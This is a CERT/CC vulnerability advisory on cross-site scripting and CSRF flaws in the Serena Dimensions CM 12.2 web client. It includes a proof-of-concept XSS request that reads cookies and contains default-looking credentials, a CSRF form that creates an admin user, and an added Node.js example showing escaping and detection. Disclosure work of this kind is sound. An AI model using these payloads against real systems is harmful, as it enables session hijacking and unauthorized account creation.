
CERT Coordination Center

Serena Dimensions CM 12.2 Build 7.199.0 web client vulnerabilities

Vulnerability Note VU#823452

Original Release Date: 2014-03-05 | Last Revised: 2015-09-17

Overview

Serena Dimensions CM 12.2 Build 7.199.0 web client, and possibly earlier versions, contains multiple cross-site scripting vulnerabilities and a cross-site request forgery vulnerability.

Description

Serena Dimensions CM 12.2 Build 7.199.0 web client, and possibly earlier versions, contains multiple cross-site scripting vulnerabilities (some reachable without authentication) and a cross-site request forgery vulnerability in the admin console. Details and proof-of-concept requests follow.

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') - CVE-2014-0335

#Unauthenticated vulnerable parameters
/dimensions/ [DB_CONN parameter]
/dimensions/ [DB_NAME parameter]
/dimensions/ [DM_HOST parameter]
/dimensions/ [MAN_DB_NAME parameter]


#Authenticated vulnerable parameters
/dimensions/ [framecmd parameter]
/dimensions/ [identifier parameter]
/dimensions/ [merant.adm.adapters.AdmDialogPropertyMgr parameter]
/dimensions/ [nav_frame parameter]
/dimensions/ [nav_jsp parameter]
/dimensions/ [target_frame parameter]
/dimensions/ [id parameter]
/dimensions/ [type parameter]


Proof-of-Concept:
GET /dimensions/?jsp=login&USER_ID=sa_dmsys&PASSWORD=D%21m3nsions&SYSTEM_DEFINITIONS=0&FORWARD_TARGET=jsp%25253dlogin&MAN_DB_NAME=2f<%2fscript><script>alert(document.cookie)<%2fscript>207&MAN_DB_CONN=&MAN_DM_HOST=&DM_HOST=TEST1&DB_NAME=TEST2&DB_CONN=TEST3&apiConnDetails=&MENU_SET=Default HTTP/1.1
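The following Node.js snippet is an added illustration, not code from the advisory or from Serena. It percent-decodes the MAN_DB_NAME value from the proof-of-concept request above, renders it the way a vulnerable page might (the renderVulnerable and renderHardened functions are a hypothetical model of the login page; the advisory does not show the vendor's template), and applies HTML escaping in the hardened version. The parseQuery, escapeHtml and containsInjectedScript names are assumptions for this example.

```javascript
// Added example, not the advisory's or the vendor's code. The render functions
// are a hypothetical model of how the login page might reflect MAN_DB_NAME;
// the advisory does not show the vendor's template.

// Query string copied from the advisory's proof-of-concept request line.
const POC_QUERY =
  'jsp=login&USER_ID=sa_dmsys&PASSWORD=D%21m3nsions&SYSTEM_DEFINITIONS=0' +
  '&FORWARD_TARGET=jsp%25253dlogin' +
  '&MAN_DB_NAME=2f<%2fscript><script>alert(document.cookie)<%2fscript>207' +
  '&MAN_DB_CONN=&MAN_DM_HOST=&DM_HOST=TEST1&DB_NAME=TEST2&DB_CONN=TEST3' +
  '&apiConnDetails=&MENU_SET=Default';

// Percent-decode each parameter the way a servlet container would.
function parseQuery(query) {
  return Object.fromEntries(new URLSearchParams(query));
}

// Vulnerable rendering (hypothetical): the raw value is concatenated into an
// inline script, so "</script>" in the value ends that script element and the
// attacker's "<script>...</script>" that follows becomes a new one.
function renderVulnerable(params) {
  return '<script>var manDb = "' + params.MAN_DB_NAME + '";</script>';
}

// HTML-escape the five characters that matter in text and attribute contexts.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, c => map[c]);
}

// Hardened rendering (hypothetical): the value is placed in an attribute and
// escaped for that context; page script reads it from the DOM instead of
// having it spliced into JavaScript source.
function renderHardened(params) {
  return '<input type="hidden" id="manDb" name="MAN_DB_NAME" value="' +
    escapeHtml(params.MAN_DB_NAME) + '">';
}

// Detection check for a response body: did the input break out of its
// context and open a script element of its own?
function containsInjectedScript(html) {
  return /<\/script\s*>\s*<script\b/i.test(html);
}

const params = parseQuery(POC_QUERY);
console.log('decoded MAN_DB_NAME:', params.MAN_DB_NAME);
console.log('vulnerable page injected?', containsInjectedScript(renderVulnerable(params)));
console.log('hardened page injected?  ', containsInjectedScript(renderHardened(params)));
```

The same containsInjectedScript check can be run over a real response to confirm whether a given parameter is reflected unencoded; the escaping shown is context-specific, so a value that genuinely must live inside a script block needs JavaScript-string escaping as well, not just HTML escaping.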


CWE-352: Cross-Site Request Forgery (CSRF) - CVE-2014-0336

Proof-of-Concept:
<html>

<!-- CSRF PoC: when a user who is logged in to the Dimensions CM admin console
     loads this page and submits the form, the browser attaches the victim's
     session cookie and the console creates a new user; no anti-CSRF token is
     required by the target. -->

<body>

<form
action="http://testhost:8080/adminconsole/?jsp=user_new_master&target=merant.adm.dimensions.objects.User&create=yes" method="POST">
<input type="hidden" name="&#45;AdmAttrNames&#46;user&#95;dept" value="" />
<input type="hidden" name="&#45;AdmAttrNames&#46;id" value="HACKTEST1" />
<input type="hidden" name="USER&#95;CURWORKSET" value="&#37;24GENERIC&#37;3a&#37;24GLOBAL" />

<input type="hidden" name="isUserEdit" value="false" />
<input type="hidden" name="&#45;AdmAttrNames&#46;user&#95;site" value="" />
<input type="hidden" name="&#45;AdmAttrNames&#46;user&#95;phone" value="" />
<input type="hidden" name="AUTOMATIC&#95;LOGIN" value="" />
<input type="hidden" name="&#45;AdmAttrNames&#46;user&#95;group&#95;id" value="" />
<input type="hidden" name="null" value="" />
<input type="hidden" name="DIALOG&#95;MODE" value="MODE&#37;5fCREATE" />
<input type="hidden" name="&#45;AdmAttrNames&#46;user&#95;full&#95;name" value="HACKTEST1" />

<input type="hidden" name="projectPicker" value="&#37;24GENERIC&#37;3a&#37;24GLOBAL" />
<input type="hidden" name="wait&#95;until&#95;loaded" value="" />
<input type="hidden" name="projectPickerUid" value="1" />
<input type="hidden" name="GROUPS&#95;ASSIGNED" value="" />
<input type="hidden" name="&#45;AdmAttrNames&#46;email" value="ken1&#37;2ecijsouw&#37;40sincerus&#37;2enl" />

<input type="submit" value="Submit request" />
</form>
</body>
</html>

Impact

A remote unauthenticated attacker may be able to execute arbitrary script in the context of the end-user's browser session (CVE-2014-0335). By convincing a user who is logged in to the admin console to visit a crafted page, an attacker may also be able to perform actions on that user's behalf, such as creating a new user account as the proof-of-concept above does (CVE-2014-0336).

Solution

Apply an update


The vendor has addressed these issues in version 14.1. Users are encouraged to update to the latest release.

Restrict access

As a general good security practice, only allow connections from trusted hosts and networks. Note that restricting access does not by itself prevent XSS or CSRF attacks, since in both cases the malicious request is issued by a legitimate user's browser from an allowed host. Restricting access would, however, prevent an attacker from reaching the interface with stolen credentials or a captured session cookie from a blocked network location.

Vendor Information


SERENA Software Inc

Updated:  September 17, 2015

Statement Date:   September 17, 2015

Status

Affected

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

VU#823452 has been addressed in Dimensions CM version 14.1 and later, released in June 2014.


CVSS Metrics

Group          Score  Vector
Base           6.8    AV:N/AC:M/Au:N/C:P/I:P/A:P
Temporal       5.5    E:POC/RL:U/RC:UC
Environmental  1.4    CDP:ND/TD:L/CR:ND/IR:ND/AR:ND

Acknowledgements

Thanks to Ken Cijsouw for reporting this vulnerability.

This document was written by Michael Orlando.

Other Information

CVE IDs: CVE-2014-0335, CVE-2014-0336
Date Public: 2014-03-07
Date First Published: 2014-03-05
Date Last Updated: 2015-09-17 14:15 UTC
Document Revision: 14

Sponsored by CISA.